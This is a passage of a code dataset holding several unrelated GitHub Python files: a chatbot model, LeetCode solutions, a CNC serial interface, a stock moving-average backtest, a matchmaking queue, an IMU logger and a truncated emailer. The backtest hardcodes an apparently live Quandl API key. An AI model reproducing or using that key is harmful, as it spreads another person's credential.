creation'''\r\n\r\nmodel=Sequential()\r\nmodel.add(Embedding(input_dim=100,output_dim=200,input_length=max_len))\r\nmodel.add(LSTM(128,return_sequences=True))\r\nmodel.add(Dense(128,activation='relu'))\r\nmodel.add(LSTM(128,return_sequences=True))\r\nmodel.add(Dense(128,activation='relu'))\r\nmodel.add(LSTM(128,return_sequences=True))\r\nmodel.add(Dense(128,activation='relu'))\r\nmodel.add(Flatten())\r\nmodel.add(Dense(len(classes),activation='softmax'))\r\n\r\nmodel.compile(loss='categorical_crossentropy',optimizer='Adam',metrics=['accuracy'])\r\n\r\nmodel.fit(padded_sentence,train_y,epochs=100,verbose=1)\r\n\r\nmodel.save('chatbot.h5')\r\n \r\n\r\n\r\n","repo_name":"Arjunprasaath/chatbot","sub_path":"chatbot_alg.py","file_name":"chatbot_alg.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4098262780","text":"#!/usr/bin/python -t\n\n\n# array\n# time O(n)\n# space O(1)\n\nclass Solution:\n def summaryRanges(self, nums: List[int]) -> List[str]:\n ret = []\n i = 0\n\n while i < len(nums):\n start = nums[i]\n\n while i+1 < len(nums) and nums[i] + 1 == nums[i+1]:\n i += 1\n\n if nums[i] != start:\n ret.append(str(start) + \"->\" + str(nums[i]))\n else:\n ret.append(str(nums[i]))\n\n i += 1\n\n return ret\n\nclass Solution(object):\n def summaryRanges(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[str]\n \"\"\"\n n = len(nums)\n ret = []\n if n == 0:\n return ret\n index = 0\n i = 0\n \n while i < n:\n start = i\n end = i\n \n while end < n -1 and (nums[end]+1 == nums[end+1]):\n end = end + 1\n \n if end > start:\n s = str(nums[start]) + \"->\" + str(nums[end])\n #ret.append(s)\n else:\n s = str(nums[start])\n ret.append(s)\n i = end + 1\n \n return ret\n\n","repo_name":"boknowswiki/mytraning","sub_path":"lc/python/228_summary_ranges.py","file_name":"228_summary_ranges.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"70873670333","text":"working_day_events = input().split('|')\nenergy = 100\ncoins = 100\nis_open = True\n\nfor events in working_day_events:\n events = events.split('-')\n event_or_ingredient = events[0]\n number = int(events[1])\n\n if event_or_ingredient == 'rest':\n if (energy + number) >= 100:\n print(f'You gained {energy - 100} energy.')\n energy = 100\n else:\n print(f'You gained {number} energy.')\n energy += number\n\n print(f'Current energy: {energy}.')\n\n elif event_or_ingredient == 'order':\n if (energy - 30) >= 0:\n print(f'You earned {number} coins.')\n coins += number\n energy -= 30\n else:\n print(f'You had to rest!')\n energy += 50\n\n else:\n if (coins - number) > 0:\n print(f'You bought {event_or_ingredient}.')\n coins -= number\n else:\n print(f'Closed! Cannot afford {event_or_ingredient}.')\n is_open = False\n break\n\nif is_open:\n print(f'Day completed!\\nCoins: {coins}\\nEnergy: {energy}')\n","repo_name":"KaloyankerR/python-fundamentals-repository","sub_path":"Assignments/Lists Basics/Exercise/10. Bread Factory.py","file_name":"10. Bread Factory.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42815615634","text":"import threading\nimport time\nimport serial\nimport queue as Queue\nimport re\nimport logger\nimport datetime as dt\n\nRX_BUFFER_SIZE = 128\nBAUD_RATE = 115200\nENABLE_STATUS_REPORTS = True\nREPORT_INTERVAL = 1.0 # seconds\n\nverbose = True\n\nclass MachineInterface(object):\n\n def __init__(self, logger, port, baud, pollingInterval=.1):\n\n self.pollingInterval = pollingInterval\n self.logger = logger\n self.currentJob = None\n self.lastJob = None;\n\n # self.serialPort = serial.Serial(port, baud)\n self.serialPort = serial.Serial()\n self.serialPort.port = port\n self.serialPort.baudrate = 115200\n self.serialPort.timeout = 1\n self.serialPort.setDTR(False)\n self.serialPort.open()\n self.timer = dt.datetime.utcnow()\n\n # Wake up grbl\n self.serialPort.write(\"\\r\\n\\r\\n\".encode())\n time.sleep(2) # Wait for grbl to initialize\n self.serialPort.flushInput() # Flush startup text in serial input\n\n self.status = \"\"\n self.syncLock = threading.RLock()\n self.allowMdi = True\n self.runQueue = Queue.Queue()\n self.historyQueue = dict()\n self.jobId = 0\n self.machineStatus = dict(\n id=None, status=\"Idle\", type=\"\", error=\"\", errorCount=0, data=None)\n self.isShuttingDown = False\n\n self.thread = threading.Thread(target=self.run, args=[pollingInterval])\n self.thread.daemon = True # Daemonize thread\n self.thread.start() # Start the execution\n\n def shouldUpdateStatus(self):\n return (dt.datetime.utcnow() - self.timer).microseconds > 1000\n\n def shutdown(self):\n self.logger.debug(\"shutdown\")\n self.isShuttingDown = True\n self.logger.debug(\"drain queue\")\n self.runQueue.join()\n self.logger.debug(\"term bg thread\")\n self.thread.join()\n self.logger.debug(\"shutdown: done\")\n\n def setMachineStatus(self, status):\n self.logger.debug(\"set-machine-status\")\n self.syncLock.acquire()\n\n if (\"abort\" in status):\n self.machineStatus[\"abort\"] = status[\"abort\"]\n\n if (\"id\" in status):\n self.machineStatus[\"id\"] = status[\"id\"]\n\n if (\"type\" in status):\n self.machineStatus[\"type\"] = status[\"type\"]\n\n if (\"status\" in status):\n self.machineStatus[\"status\"] = status[\"status\"]\n\n if (\"error\" in status):\n self.machineStatus[\"error\"] = status[\"error\"]\n \n if (\"errorCount\" in status):\n self.machineStatus[\"errorCount\"] = status[\"errorCount\"]\n \n if (\"data\" in status):\n self.machineStatus[\"data\"] = status[\"data\"]\n\n self.syncLock.release()\n self.logger.debug(\"set-machine-status: done\")\n\n def getMachineStatus(self):\n return self.machineStatus\n\n def getStatus(self):\n self.syncLock.acquire()\n statusBuf = self.status\n self.syncLock.release()\n return statusBuf\n\n def getJob(self, jobId):\n if jobId in self.historyQueue:\n return self.historyQueue[jobId]\n return None\n\n def getEngineStatus(self):\n ljob = self.cloneJob(self.lastJob)\n cjob = self.cloneJob(self.currentJob)\n\n return dict(lastJob = ljob, currentJob = cjob)\n\n def cloneJob(self, job):\n\n if job is None:\n return dict()\n\n newJob = dict(id=job[\"id\"], type=job[\"type\"], eof=job[\"eof\"], status=job[\"status\"], result=job[\"result\"],\n errorCount=job[\"errorCount\"])\n\n if newJob[\"type\"] == \"mdi\":\n newJob[\"block\"] = job[\"block\"]\n else:\n newJob[\"fileName\"] = job[\"fileName\"]\n newJob[\"lineCount\"] = job[\"lineCount\"]\n newJob[\"charCounts\"] = job[\"charCounts\"]\n newJob[\"grblCount\"] = job[\"grblCount\"]\n\n return newJob\n\n def setStatus(self, status):\n self.logger.debug(\"set-status\")\n self.syncLock.acquire()\n self.status = status\n self.timer = dt.datetime.utcnow()\n self.syncLock.release()\n self.logger.debug(\"set-status: done\")\n\n def mdi(self, cmd, newLine, block=False):\n self.logger.debug(\"queue mdi command: \" + cmd)\n self.jobId = self.jobId + 1\n\n job = dict(id=self.jobId, type=\"mdi\", eof=0, status=0, result=\"\",\n block=cmd, errorCount=0, newLine=newLine)\n self.runQueue.put(job)\n\n if (block):\n while (job[\"status\"] == 0):\n time.sleep(0.05)\n return job[\"result\"]\n\n return job;\n\n def file(self, fileName):\n self.logger.debug(\"queue file job: \" + fileName)\n self.jobId = self.jobId + 1\n job = dict(id=self.jobId, type=\"file\", eof=0, status=0,\n fileName=fileName, lineCount=0, errorCount=0, fd=None, \n result=\"\", charCounts = 0, grblCount = 0 )\n self.runQueue.put(job)\n return self.cloneJob(job)\n\n def run(self, p):\n\n state = 0 # idle\n self.currentJob = None\n\n while state != 3:\n\n currentStatus = self.getMachineStatus()\n if (\"abort\" in currentStatus and currentStatus[\"abort\"]):\n # drain the queue\n draining = True\n self.logger.debug('abort detected, draining')\n while draining:\n try:\n jobIWontRun = self.runQueue.get(True, .01)\n\n except Queue.Empty:\n draining = False\n state = 0\n self.lastJob = self.currentJob\n self.lastJob[\"result\"] = \"aborted\"\n\n if state == 0:\n while (self.currentJob is None and not self.isShuttingDown):\n try:\n self.logger.debug('next job or sleep')\n self.currentJob = self.runQueue.get(True, 1)\n\n except Queue.Empty:\n self.logger.debug(\n \"timed waiting for job. housekeeping now\")\n\n if (self.shouldUpdateStatus()):\n self.exec_status()\n\n if (self.currentJob):\n self.logger.debug('run job : ' + str(self.currentJob[\"id\"]))\n state = 1\n\n if (self.isShuttingDown and self.currentJob is None):\n state = 3\n continue\n\n if (self.shouldUpdateStatus()):\n self.exec_status()\n\n # Doing real work\n if (self.currentJob[\"type\"] == \"mdi\"):\n self.setMachineStatus(\n dict(id=self.currentJob[\"id\"], status=\"Running\", type=\"mdi\", data=self.currentJob[\"block\"]))\n\n self.logger.debug('running mdi job ' + self.currentJob[\"block\"])\n self.currentJob[\"result\"] = self.exec_cmd(self.currentJob[\"block\"], self.currentJob[\"newLine\"])\n self.runQueue.task_done()\n self.currentJob[\"status\"] = 1\n state = 0\n self.lastJob = self.currentJob\n self.historyQueue[self.currentJob[\"id\"]] = self.currentJob\n self.currentJob = None\n self.setMachineStatus(dict(id=None, status=\"Idle\", type=\"\"))\n\n elif (self.currentJob[\"type\"] == \"file\" and self.currentJob[\"fd\"] == None):\n self.setMachineStatus(\n dict(id=self.currentJob[\"id\"], status=\"Running\", type=\"mdi\", data=self.currentJob[\"fileName\"]))\n\n self.logger.debug('starting file ' + self.currentJob[\"fileName\"])\n self.prep_file_job(self.currentJob)\n elif (self.currentJob[\"eof\"] >= 2):\n self.logger.debug('cleanup file ' + self.currentJob[\"fileName\"])\n self.runQueue.task_done()\n self.cleanup_file_job(self.currentJob)\n self.currentJob[\"status\"] = 1\n self.currentJob[\"result\"] = \"Ok\"\n self.lastJob = self.currentJob\n self.historyQueue[self.currentJob[\"id\"]] = self.currentJob\n self.currentJob = None\n state = 0\n self.setMachineStatus(dict(id=None, status=\"Idle\", type=\"\"))\n else:\n self.logger.debug('continue file job ' + self.currentJob[\"fileName\"])\n self.exec_file(self.currentJob)\n\n def prep_file_job(self, job):\n # need to setup the file for reading\n job[\"grblCount\"] = 0\n self.logger.debug(\"prep file \" + job[\"fileName\"])\n job[\"fd\"] = open(job[\"fileName\"], 'r')\n job[\"charCounts\"] = []\n job[\"lineCount\"] = 0\n\n def cleanup_file_job(self, job):\n # need to setup the file for reading\n job[\"fd\"].close()\n job[\"fd\"] = None\n\n def exec_status(self):\n self.logger.debug(\"exec-status\")\n self.serialPort.write(\"?\".encode())\n result = self.serialPort.readline().strip()\n self.setStatus(result)\n self.logger.debug(\"exec-status:done\")\n\n def exec_file(self, job):\n\n grbl_out = ''\n\n # line = job[\"fd\"].readline(job[\"lineCount\"])\n line = job[\"fd\"].readline()\n\n l_block = re.sub('\\s|\\(.*?\\)', '', line).upper()\n\n if (l_block == \"\"):\n job[\"eof\"] += 1\n\n job[\"charCounts\"].append(len(l_block)+1)\n\n while sum(job[\"charCounts\"]) >= RX_BUFFER_SIZE-1 | self.serialPort.inWaiting():\n out_temp = self.serialPort.readline().strip() # Wait for grbl response\n if out_temp.find('ok') < 0 and out_temp.find('error') < 0:\n self.logger.debug(\" MSG: \\\"\"+out_temp +\n \"\\\"\") # Debug response\n else:\n if out_temp.find('error') >= 0:\n self.setMachineStatus(dict(error=out_temp, errorCount=job[\"errorCount\"]))\n job[\"errorCount\"] += 1\n\n job[\"grblCount\"] += 1 # Iterate g-code counter\n self.logger.debug(\n \"REC < \"+str(job[\"grblCount\"])+\": \\\"\"+out_temp+\"\\\"\")\n # Delete the block character count corresponding to the last 'ok'\n del job[\"charCounts\"][0]\n\n if (len(l_block) > 0):\n job[\"lineCount\"] += 1 # Iterate line counter\n self.setMachineStatus(dict(data=l_block));\n self.serialPort.write(str.encode(l_block + '\\n')) # Send g-code block to grbl\n self.logger.debug(\n \"SND > \"+str(job[\"lineCount\"])+\": \\\"\" + l_block + \"\\\"\")\n\n # Wait until all responses have been received.\n while job[\"lineCount\"] > job[\"grblCount\"]:\n out_temp = self.serialPort.readline().decode().strip() # Wait for grbl response\n if out_temp.find('ok') < 0 and out_temp.find('error') < 0:\n self.logger.debug(\"-> MSG: \\\"\"+out_temp+\"\\\"\") # Debug response\n else:\n if out_temp.find('error') >= 0:\n self.setMachineStatus(dict(error=out_temp, errorCount=job[\"errorCount\"]))\n job[\"errorCount\"] += 1\n job[\"grblCount\"] += 1 # Iterate g-code counter\n\n # Delete the block character count corresponding to the last 'ok'\n del job[\"charCounts\"][0]\n if verbose:\n self.logger.debug(\n \"REC < \"+str(job[\"grblCount\"])+\": \\\"\"+out_temp + \"\\\"\")\n\n def exec_cmd(self, cmd, newline=True):\n\n if (not self.allowMdi):\n return \"\"\n\n self.logger.debug(\"SND > \"+cmd)\n self.setMachineStatus(dict(data=cmd));\n self.serialPort.write(cmd.encode())\n\n if newline:\n self.serialPort.write(\"\\n\".encode())\n\n resp = ''\n\n while 1:\n # Wait for grbl response with carriage return\n grbl_out = self.serialPort.readline().decode('utf8').strip()\n self.logger.debug(\"REC < \"+grbl_out)\n if grbl_out.find(\"Grbl\") >= 0:\n resp = ''\n elif grbl_out.find(\"ok\") >= 0:\n break\n elif grbl_out.find(\"error\") >= 0:\n self.setMachineStatus(dict(error=grbl_out, errorCount=1))\n break\n else:\n resp += grbl_out\n\n return resp\n","repo_name":"yaitde-x/borg-cnc","sub_path":"src/borg-py-api/machineinterface.py","file_name":"machineinterface.py","file_ext":"py","file_size_in_byte":12414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"69905414334","text":"import calendar\nimport datetime\nimport quandl\nfrom matplotlib.backends.backend_pdf import PdfPages\nfrom BasicFunctions import *\nimport matplotlib.pyplot as plt\nimport numpy\n\n\nmoving_averages = [5, 10, 15, 20]\ncombination_keys = [(moving_averages[i], moving_averages[j]) for i in range(len(moving_averages)) for j in range(i+1, len(moving_averages))]\ncombination_dict = {}\nfor i in combination_keys:\n combination_dict[i]= []\nmonths = [\"\", \"January\", \"February\", \"March\", \"April\", \"May\", \"June\", \"July\",\n \"August\", \"September\", \"October\", \"November\", \"December\"]\n\nticker = \"C\"\ndf = quandl.get('WIKI/' + ticker, api_key=\"T2K2v57vDVL9Wwx_ia3c\")\n\n# make it continuous dont start over each month\n# run it over whole month and then check stats\n# also run s&p 500\n# for each combination graph the curve for portfolio value\n# for each combination send the portfolio value curve\n# combination map to vector of portfolio value\n# calculate annualized return for a bunch of stuff\n# graph show plot as annualized return\nbest_yearly_performances = []\nbest_yearly_averages = []\nbest_total_averages = []\nbest_total_performances = []\nfor year in range(1977, 2018):\n best_yearly_performance = -float('inf')\n best_yearly_config = []\n best_monthly_performances = []\n best_monthly_averages = []\n for month in range(1, 13):\n last_day = calendar.monthrange(year, month)[1]\n dataset = df[\"Close\"][datetime.date(year, month, 1):datetime.date(year, month, last_day)]\n best_monthly_performance = -float('inf')\n best_monthly_config = []\n for i in range(len(moving_averages)-1):\n for j in range(i+1, len(moving_averages)):\n trade = ma_trade(dataset, moving_averages[i], moving_averages[j])\n hold = price_2_invest(dataset, trade)\n performance = ((hold[-1] - hold[0]) / hold[0]) * 100 # percentage\n combination_dict[(moving_averages[i], moving_averages[j])].append(performance)\n if performance > best_monthly_performance:\n best_monthly_performance = performance\n best_monthly_config = [moving_averages[i], moving_averages[j]]\n\n # end of a month\n if best_monthly_performance > best_yearly_performance:\n best_yearly_performance = best_monthly_performance\n best_yearly_config = best_monthly_config\n best_monthly_performances.append(best_monthly_performance)\n best_monthly_averages.append(best_monthly_config)\n print(months[month] + \" \" + str(year) + \":\")\n print(\"\\tBest Configuration:\\n\\tma_fast: \" + str(best_monthly_config[0]) + \"\\n\\tma_slow: \" + str(best_monthly_config[1]))\n print(\"Best Performance: \" + str(best_monthly_performance) + \"%\\n\\n\")\n\n # end of a year\n\n print(str(year) + \" Best: \")\n print(\"\\tBest Configuration:\\n\\tma_fast: \" + str(best_yearly_config[0]) + \"\\n\\tma_slow: \" + str(\n best_yearly_config[1]))\n print(\"Best Performance: \" + str(best_yearly_performance) + \"%\\n\\n\")\n best_total_averages.append(best_monthly_averages)\n best_total_performances.append(best_monthly_performances)\n best_yearly_performances.append(best_yearly_performance)\n best_yearly_averages.append(best_yearly_config)\n\n#graphing\nfig = plt.figure(figsize=(20, 3))\nax = fig.add_subplot(111)\nfor i in combination_dict.keys():\n ax.plot(combination_dict[i], label=str(i))\n\ndays = len(combination_dict[combination_keys[0]])\nplt.legend()\nplt.xticks(range(0, days, 10))\n# plt.figure(figsize=(20, 2))\n# plt.tight_layout()\nplt.show()\n# with PdfPages(r'C:\\Users\\arjun\\PycharmProjects\\QuantitativeStockSelectionAndTrading\\MovingAverageTest.pdf') as export_pdf:\n# export_pdf.savefig(fig)\n# plt.close()\n\n\"\"\"\nbest yearly performances:\nlist containing the largest percent gain in each year\nas many elements(floats) as there are years\nbest yearly averages:\nlist containing the best configuration of averages for each year\nas many elements(lists representing configuration) as there are years\nbest total averages:\nlist containing lists of the best configuration for each month (as many lists as there are years, with each list containing twelve lists of length 2 for the averages)\nbest total performances:\nlist containing lists of the best performances for each month (as many lists as there are years, with each list containing a list of length 12 for the performances)\n\nNOTE:\nbest yearly performances should select the max of each of the yearly lists in best total averages\nbest yearly averages should select the best of each of the yearly lists in best total averages, which correspond to the best performances for that year\n\"\"\"\n\n","repo_name":"arjnai21/QuantitativeStockSelectionAndTrading","sub_path":"oldstuff/TestMovingAverages.py","file_name":"TestMovingAverages.py","file_ext":"py","file_size_in_byte":4670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36233906553","text":"# src/matchmaking/queue_manager.py\n\nimport queue\nfrom src.classes.Match import Match\nfrom src.classes.Player import Player\nfrom src.config import MAX_MATCHES, MIN_MATCHES, MIN_PLAYERS, RANKS\n\n\nclass QueueManager:\n def __init__(self):\n self.matchmaking_queue = queue.Queue()\n self.matches = []\n\n def generate_match(self, level=None):\n if len(self.matches) >= MAX_MATCHES:\n return {\n \"error\": True,\n \"msg\": \"max matches\",\n \"code\": \"\",\n }\n\n m = Match(level)\n self.matches.append(m)\n return {\"error\": False}\n\n def generate_matches(self, num: int = MAX_MATCHES):\n print(num)\n for i in range(num):\n resp = self.generate_match()\n if resp.get(\"error\", None) == True:\n break\n\n def remove_player_from_queue(self, player_name):\n players_in_queue = []\n removed_player = None\n\n while not self.matchmaking_queue.empty():\n player = self.matchmaking_queue.get()\n\n if player.username == player_name:\n removed_player = player # Save the removed player\n else:\n players_in_queue.append(player)\n\n # Put back the remaining players into the queue\n for player in players_in_queue:\n self.matchmaking_queue.put(player)\n\n return removed_player\n\n def add_player_to_queue(self, player_details):\n self.matchmaking_queue.put(player_details)\n\n def get_all_players(self):\n players = []\n for i in range(self.get_queue_size()):\n player_d = self.matchmaking_queue.get()\n players.append(player_d)\n self.matchmaking_queue.put(player_d)\n return players\n\n def group_players_by_rank(players):\n grouped_players = {}\n\n for player in players:\n rank = player[\"rank\"]\n if rank not in grouped_players:\n grouped_players[rank] = []\n grouped_players[rank].append(player)\n\n return grouped_players\n\n def task(self):\n players = self.get_all_players()\n for b in players:\n b: Player\n\n match_found = False\n for x in self.matches:\n if match_found:\n break\n if x.ready:\n print(\"denied\", b.username, \"a match\")\n continue\n x: Match\n if x.level is None:\n x.add_player(b)\n b.match = x\n print(f\"[*] Found empty game for: {str(b)}\")\n self.remove_player_from_queue(b.username)\n match_found = True\n elif x.level == b.level:\n x.add_player(b)\n b.match = x\n print(f\"[*] Found game for: {str(b)}\")\n self.remove_player_from_queue(b.username)\n match_found = True\n\n else:\n print(f\"[*] Waiting on a game for {str(b)}\")\n\n # print(f\"Processed player: {str(b)}\")\n for i in self.matches:\n if i.ready:\n continue\n if len(i.players) - 1 >= MIN_PLAYERS:\n i.ready = True\n print(\"[*] Made match ready\")\n\n def get_player_from_queue(self):\n try:\n q = self.matchmaking_queue.get()\n for i in list(q):\n self.matchmaking_queue.put(i)\n\n return q\n except queue.Empty:\n return None\n\n def get_by_name(self, name):\n for i in range(self.get_queue_size()):\n q = self.matchmaking_queue.get()\n if q.uuid == name:\n return q\n self.matchmaking_queue.put(q)\n\n return None\n\n def get_by_uuid(self, uuid):\n for i in range(self.get_queue_size()):\n q = self.matchmaking_queue.get()\n\n if q.uuid == uuid:\n return q\n self.matchmaking_queue.put(q)\n\n return None\n\n def search_matches_uuid(self, uuid):\n for i in self.matches:\n for x in i.players:\n print(x)\n if x.uuid == uuid:\n return x\n\n return None\n\n def get_queue_size(self):\n return self.matchmaking_queue.qsize()\n","repo_name":"AJXD2/Matchmaking","sub_path":"src/matchmaking/queue_manager.py","file_name":"queue_manager.py","file_ext":"py","file_size_in_byte":4366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7712342343","text":"import scipy.io as spio\nfrom typing import List\nimport torch\nimport matplotlib.pyplot as plt\n\ndef read_mat(file_path:str, keys: List[str]):\n mat_data = spio.loadmat(file_path)\n result = []\n for k in keys:\n mat_extracted = mat_data[k]\n data = torch.from_numpy(mat_extracted)\n result.append(data)\n return result\n\ndef show_training_images(X, h, w):\n m = X.shape[0]\n\n def show_training_image(x):\n reshaped_x = torch.reshape(x, (h,w))\n reshaped_x = torch.rot90(reshaped_x, 3, [0, 1]) # not sure why its 90 degree off\n reshaped_x = torch.fliplr(reshaped_x) # not sure why flipped\n plt.imshow(reshaped_x)\n plt.show()\n\n for _ in range(min(m,10)):\n from random import randint\n i = randint(0, m-1)\n show_training_image(X[i])\n\n\n\ndef main():\n training_file = './ex4data1.mat'\n X, y = read_mat(training_file, ['X', 'y'])\n # print(X)\n # print(y)\n # print(X.shape)\n show_training_images(X, 20, 20)\n\nmain()\n","repo_name":"balloonio/coursera-machine-learning-course","sub_path":"machine-learning-ex4/torch_ex4/ex4.py","file_name":"ex4.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27729207999","text":"import rclpy\nfrom rclpy.node import Node\nfrom rclpy.qos import qos_profile_sensor_data\nfrom sensor_msgs.msg import Imu\nimport numpy\nimport yaml\n\n\nclass IMUDataLogger(Node):\n labels = ['ax','ay','az']\n\n def __init__(self):\n super().__init__('imu_data_logger')\n self.subscription = self.create_subscription(Imu,'/imu',self.listener_callback,qos_profile_sensor_data)\n self.subscription \n self.t0 = None\n self.history = None\n self.fig = None\n\n def listener_callback(self, msg):\n self.get_logger().info(\"received message\")\n\n current_time = msg.header.stamp.sec+msg.header.stamp.nanosec*1e-9\n\n\n if not self.t0:\n self.t0 = current_time\n\n t = current_time-self.t0\n\n print(t)\n\n if self.history is None:\n self.history = numpy.array([[t, msg.linear_acceleration.x, msg.linear_acceleration.y, msg.linear_acceleration.z]])\n else:\n self.history = numpy.concatenate([self.history,numpy.array([[t, msg.linear_acceleration.x, msg.linear_acceleration.y, msg.linear_acceleration.z]])],0)\n\n\ndef main(args=None):\n rclpy.init(args=args)\n\n imu_data_logger = IMUDataLogger()\n\n try:\n rclpy.spin(imu_data_logger)\n# except SystemExit:\n# print('exiting')\n except KeyboardInterrupt:\n mydata = imu_data_logger.history.tolist()\n mydict = {'data':mydata,}\n with open('file.yaml','w') as f:\n yaml.dump(mydict,f)\n\n imu_data_logger.destroy_node()\n rclpy.shutdown()\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"PraveenPaidi/Turtlebot4","sub_path":"FIR and Kalman filter/grab_data.py","file_name":"grab_data.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34758258632","text":"\"\"\"\nMain script to read and send emails from JSON files and upload batch report to s3 for the ESNC Risk Notification Project. \nExpected to be run on EPA's production environment Whippet. \n\nInstruction:\ntest: on Sherlock command line, run: \nsingularity exec $GROUP_HOME/singularity/epa_7-08-21_2.sif python3 -m 1_whippet_sender --mode test --run_id --system \nprod: on whippet command line, run (not tested)\npython3 -m 1_whippet_sender --mode prod --run_id --system whippet\n\nThe main script follows these steps:\n1. import installed packages and supporting modules\n2. set up directories and logging\n3. read email files from s3 bucket\n4. send email from whippet\n5. generate batch report \n6. save batch report to s3 bucket\n7. save logging file and sync with sherlock folde\n\nPrerequistes: \n1. must have run 0_email_maker first \n2. must have the email JSON files generated in s3 bucket\n3. must have programmatic permisssions to the s3 bucket\n4. must have aws and credentials set up on whippet. default credentials are set to Nicole's credentials (hongjinl@law.stanford.edu)\n\nSee line-by-line test in tests/line_by_line_test_whippet_sender.ipynb: https://github.com/reglab/esnc_risk_notif/blob/main/code/tests/line_by_line_test_whippet_sender.ipynb\n\nThis script would take about 1 min to run. Check emails sent to reglabtest@gmail.com (test mode) and hongjinl@law.stanford.edu (test and prod mode). \n\"\"\"\n\n# import installed packages\nimport os\nimport argparse\n\nimport pandas as pd\nimport datetime as dt\nimport logging\n\n## for s3 connection\nimport boto3\nimport subprocess\n\n## for emailer\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nimport smtplib, ssl\n\n# import supporting modules\nimport configs\nfrom utilities import json_functions\n\ndef get_args():\n \"\"\"\n Use argparse to parse command line arguments.\n\n Arguments\n --------\n mode: string\n The runner mode for whippet_sender. Available options: prod and test. prod refers production mode and test refers to testing mode.\n run_id: string\n The id of the email_maker run, required for reading email files from S3 bucket, in _ format, e.g. 2021Q3_2021-07-02_104040_958240\n system: string\n The system from where we are sending out the emails. Options: sherlock (Stanford) or whippet (EPA).\n \"\"\"\n parser = argparse.ArgumentParser(description=\"Use argparse to parse command line arguments. Required: mode, run_id.\")\n\n parser.add_argument(\n '--mode',\n help='The runner mode for whippet_sender. Available options: prod and test. prod refers production mode and test refers to testing mode.',\n type=str,\n required=True,\n default='test'\n )\n parser.add_argument(\n '--run_id',\n help=\"The id of the email_maker run, required for reading email files from S3 bucket, in _ format, e.g. 2021Q3_2021-07-02_104040_958240\",\n type=str,\n required=True\n )\n parser.add_argument(\n '--system',\n help=\"The system from where we are sending out the emails. Options: sherlock (Stanford) or whippet (EPA).\",\n type=str,\n required=True\n )\n\n args = parser.parse_args()\n\n return args\n\ndef main():\n \"\"\"\n Send emails from whippet and generate batch report. \n \"\"\"\n print(configs.HELPER_TEXT_WHIPPET_SENDER)\n print(\"===== Start running whippet sender =====\")\n\n ## get parsed variables\n args = get_args()\n mode = args.mode\n run_id = args.run_id\n system = args.system\n assert mode in ['test', 'prod'], 'Expect mode to be in test or prod. Aborting.'\n assert system in ['sherlock', 'whippet'], 'Expect system to be in sherlock or whippet. Aborting.'\n\n ## get global variables\n bucket = configs.BUCKET\n s3_project_dir = configs.S3_PROJECT_DIR\n prod_from_addr = configs.PROD_FROM_ADDR\n test_from_addr = 'reglabtest@gmail.com' # 2021-08-04 hardcoded temporarily. Ideally, we would want to add an environment variable to the whippet system. configs.TEST_FROM_ADDR\n test_to_addr = 'reglabtest@gmail.com' # see above. configs.TEST_TO_ADDR\n test_addr_pwd = configs.TEST_ADDR_PWD\n test_bcc_addr = configs.TEST_BCC_ADDR \n\n ## set directories based on mode and run_id \n s3_run_dir = os.path.join(mode, run_id)\n s3_emails_dir = os.path.join(s3_run_dir, 'emails')\n s3_log_dir = os.path.join(s3_run_dir, 'logs')\n\n ## configure logging\n logger, log_capture_string = configs.configure_logging(logger_name = 'whippet_sender')\n logger.info(configs.HELPER_TEXT_WHIPPET_SENDER)\n logger.info(\"Configured logger\")\n logger.info(\"----- Parsed variables: mode = {}, run_id = {}\".format(mode, run_id))\n logger.info(\"----- S3 bucket: s3_project_dir = {}, s3_run_dir = {}\".format(s3_project_dir, s3_run_dir))\n logger.info(\"----- From email address: {}\".format(test_from_addr if system == 'sherlock' else prod_from_addr))\n logger.info(\"----- To email address: {}\".format(test_to_addr if mode == 'test' else 'facility addresses'))\n\n ## print out variables and let the user confirm if they are correct and wish to proceed. \n print(\"----- Parsed variables: mode = {}, run_id = {}\".format(mode, run_id))\n print(\"----- S3 bucket: s3_project_dir = {}, s3_run_dir = {}\".format(s3_project_dir, s3_run_dir))\n print(\"----- From email address: {}\".format(test_from_addr if system == 'sherlock' else prod_from_addr))\n print(\"----- To email address: {}\".format(test_to_addr if mode == 'test' else 'facility addresses'))\n\n proceed = input('Please verify the above variables. Do you wish to proceed with the run? [y/n]')\n\n # if proceed, run the rest of the script\n if proceed == 'y':\n logger.info('====== 1/7 Reading email files from s3 bucket =======')\n email_dicts = json_functions.read_emails_from_json(s3_emails_dir, s3=True, bucket=bucket)\n\n logger.info('====== 2/7 Generating email objects with dictionaries =======')\n notif_permits = [e['npdes_permit_id'] for e in email_dicts]\n logger.info(f'for the following permit ids (totalling {len(notif_permits)} permits): {notif_permits}')\n \n logger.info(f'======== 3/7 Sending emails with whippet sender mode: {mode} =========') \n # compile emails\n for email in email_dicts:\n logger.info(f\"Compiling email for {email['npdes_permit_id']}\")\n msg = MIMEMultipart('alternative')\n msg['Subject'] = email['subject']\n msg.attach(MIMEText(email['header'] + email['body'], 'html'))\n email['whippet_sender_mode'] = mode\n\n # send emails\n logger.info(f'Sending email to test email address {test_to_addr}')\n if mode == 'test':\n msg['To'] = test_to_addr\n msg['BCC'] = test_bcc_addr\n\n # sending out from sherlock: using a test gmail account\n if system == 'sherlock': \n msg['From'] = test_from_addr\n password = test_addr_pwd\n port = 465 # For SSL\n smtp_server = \"smtp.gmail.com\"\n context = ssl.create_default_context()\n with smtplib.SMTP_SSL(smtp_server, port, context=context) as server:\n server.login(msg['From'], password)\n server.send_message(msg)\n\n # sending out from whippet: using epa's production email \n ## to be 